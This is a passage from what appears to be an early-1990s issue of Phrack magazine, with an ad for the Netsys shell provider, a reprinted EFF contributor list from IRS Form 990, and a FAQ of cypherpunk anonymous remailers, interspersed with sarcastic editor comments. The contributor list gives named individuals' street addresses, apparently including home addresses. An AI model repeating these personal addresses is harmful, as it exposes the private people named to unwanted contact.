  734.   Duane Dubay (djd@pagesat.com).
  735.  
  736.  We offer other services such as creating domains, acting as MX
  737.  forwarders, and of course uucp based newsfeeds.
  738.  
  739.  Netsys is now offering completely open shell access to Internet users.
  740.  For accounts, or more information , send mail to netsys@netsys.com
  741.  
  742.  Netsys will NEVER accept more members than our capacity to serve.
  743.  
  744.  Netsys prides itself on it's excellent connectivity (including multiple T1's,
  745.  and SMDS), lightly loaded systems, and it's clientele.
  746.  
  747.  We're not your average Internet Service Provider. And it shows.
  748. --------------------------------------------------------------------
  749. [Editor:  We here at Phrack are forever in debt to Mr. Len Rose for
  750.           allowing us to use ftp.netsys.com as our new official FTP
  751.           site after getting the boot off EFF.  It takes a steel
  752.           set of huevos to let such an evil hacker publication
  753.           reside on your hard drive after serving time for having
  754.           dealings with evil hackers.  We are STOKED!  Thanks Len!
  755.           Netsys is not your average site, INDEED!]
  756.  
  757. ****************************************************************************
  758.  
  759. Something Phrack might like to see:
  760.  
  761. The contributors to and practices of the Electronic Frontier Foundation
  762. disclose quite accurately, just who this organization represents.  We
  763. challenge the legitimacy of the claim that this is a "public interest"
  764. advocate.  Here is a copy of their list of contributors:
  765.  
  766. [FINS requested the Office of the Attorney General of the Commonwealth of
  767. Massachusetts to provide us with a list of contributors of over $5000, to
  768. the Electronic Frontier Foundation, required by IRS Form 990.  Timothy E.
  769. Dowd, of the Division of Public Charities, provided us with a list (dated
  770. January 21, 1993), containing the following information.  No response was
  771. given to a phone request by FINS directly to EFF, for permission to inspect
  772. and copy the most current IRS Form 990 information.]
  773.  
  774.  
  775.  
  776.                   ELECTRONIC FRONTIER FOUNDATION, INC.
  777.               IRS FORM 990. PART I - LIST OF CONTRIBUTIONS
  778.  
  779.  
  780. NAME AND ADDRESS OF CONTRIBUTOR       CONTRIBUTION
  781.                                     DATE      AMOUNT
  782.  
  783. Kapor Family Foundation
  784. C/O Kapor Enterprises, Inc.
  785. 155 2nd Street
  786. Cambridge, MA 02141                Var       100,000
  787.  
  788. Mitchell D. Kapor
  789. 450 Warren Street
  790. Brookline, MA 02146                Var       324,000
  791.  
  792. Andrew Hertzfeld
  793. 370 Channing Avenue
  794. Palo Alto, CA 94301                12/12/91    5,000
  795.  
  796.  
  797. Dunn & Bradstreet
  798. C/O Michael F. ...
  799. 1001 G Street, NW Suite 300 East
  800. Washington, DC 20001               02/12/92   10,000
  801.  
  802. National Cable Television
  803. 1724 Massachusetts Avenue, NW
  804. Washington, DC 20036               02/18/92   25,000
  805.  
  806.  
  807. MCI Communications Corporation
  808. 1133 19th Street, NW
  809. Washington, DC 20036               03/11/92   15,000
  810.  
  811. American Newspaper Publishers
  812. Association
  813. The Newspaper CTR
  814. 11600 Sunrise Valley
  815. Reston, VA 22091                   03/23/92   20,000
  816.  
  817. Apple Computer
  818. 20525 Mariani Avenue MS:75-61
  819. Cupertino, CA 95014                03/23/92   50,000
  820.  
  821. Sun Microsystems, Inc
  822. c/o Wayne Rosing
  823. 2550 Garcia Ave
  824. Mountain View, CA 94043-1100       04/03/92   50,000
  825.  
  826. Adobe Systems, Inc.
  827. c/o William Spaller
  828. 1585 Charlestown Road
  829. Mountain View, CA 94039-7900       04/16/92   10,000
  830.  
  831. International Business Systems
  832. c/o Robert Carbert, Rte 100
  833. Somers, NY 10589                   05/07/92   50,000
  834.  
  835. Prodigy Services Company
  836. c/o G. Pera...
  837. 445 Hamilton Avenue
  838. White Plains, NY 10601             05/07/92   10,000
  839.  
  840. Electronic Mail Associates
  841. 1555 Wilson Blvd. Suite 300
  842. Arlington, VA 22209                05/13/92   10,000
  843.  
  844. Microsoft
  845. c/o William H. Neukom
  846. 1 Microsoft Way
  847. Redmond, VA 98052                  06/25/92   50,000
  848.  
  849. David Winer
  850. 933 Hermosa Way
  851. Menio Park, CA 94025               01/02/92    5,000
  852.  
  853. Ed Venture Holdings
  854. c/o Ester Dvson
  855. 375 Park Avenue
  856. New York, NY 10152                 03/23/92   15,000
  857.  
  858. Anonymous                          12/26/91   10,000
  859.  
  860. Bauman Fund
  861. c/o Patricia Bauman
  862. 1731 Connecticut Avenue
  863. Washington, DC 20009-1146          04/16/92    2,500
  864.  
  865. Capital Cities ABA
  866. c/o Mark MacCarthy
  867. 2445 N. Street, NW Suite 48
  868. Washington, DC 20037               05/04/92    1,000
  869.  
  870. John Gilmore
  871. 210 Clayton Street
  872. San Francisco, CA 94117            07/23/91    1,488
  873.                                    08/06/91  100,000
  874.  
  875. Government Technology              10/08/91    1,000
  876.  
  877. Miscellaneous                      04/03/91      120
  878.  
  879. Apple Writers Grant
  880. c/o Apple Computer
  881. 20525 Mariani Avenue               01/10/92    15,000
  882.  
  883.  
  884. [Editor:  Well, hmmm.  Tell you guys what:  Send Phrack that
  885.           much money and we will give up our ideals and move to
  886.           a new location, and forget everything about what we
  887.           were all about in the beginning.  In fact, we will turn
  888.           our backs on it.  Fair?
  889.  
  890.           I was talking about me moving to Europe and giving
  891.           up computers.  Don't read anything else into that.  Nope.]
  892.  
  893. ****************************************************************************
  894.  
  895. -----BEGIN PGP SIGNED MESSAGE-----
  896.  
  897. Q1: What cypherpunk remailers exist?
  898.  
  899. A1:
  900.  
  901.  1: hh@pmantis.berkeley.edu
  902.  2: hh@cicada.berkeley.edu
  903.  3: hh@soda.berkeley.edu
  904.  4: nowhere@bsu-cs.bsu.edu
  905.  5: remail@tamsun.tamu.edu
  906.  6: remail@tamaix.tamu.edu
  907.  7: ebrandt@jarthur.claremont.edu
  908.  8: hal@alumni.caltech.edu
  909.  9: remailer@rebma.mn.org
  910. 10: elee7h5@rosebud.ee.uh.edu
  911. 11: phantom@mead.u.washington.edu
  912. 12: hfinney@shell.portal.com
  913. 13: remailer@utter.dis.org
  914. 14: 00x@uclink.berkeley.edu
  915. 15: remail@extropia.wimsey.com
  916.  
  917. NOTES:
  918. #1-#6  remail only, no encryption of headers
  919. #7-#12  support encrypted headers
  920. #15  special - header and message must be encrypted together
  921. #9,#13,#15 introduce larger than average delay (not direct connect)
  922. #14  public key not yet released
  923.  
  924. #9,#13,#15      running on privately owned machines
  925.  
  926. ======================================================================
  927.  
  928. Q2: What help is available?
  929.  
  930. A2:
  931.  
  932. Check out the pub/cypherpunks directory at soda.berkeley.edu
  933. (128.32.149.19).  Instructions on how to use the remailers are in the
  934. remailer directory, along with some unix scripts and dos batch files.
  935.  
  936. Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions.
  937.  
  938. ======================================================================
  939.  
  940.  
  941. -----BEGIN PGP SIGNATURE-----
  942. Version: 2.2
  943.  
  944. iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9
  945. lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI
  946. Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy
  947. Y6Zv0kk/7rs=
  948. =simY
  949. -----END PGP SIGNATURE-----
  950.  
  951. [Editor:  We suggest that everyone go ahead and get the info file from
  952.           soda.berkeley.edu's ftp site.  While you are there,
  953.           take a look around.  Lots of groovy free stuff.]
  954.  
  955.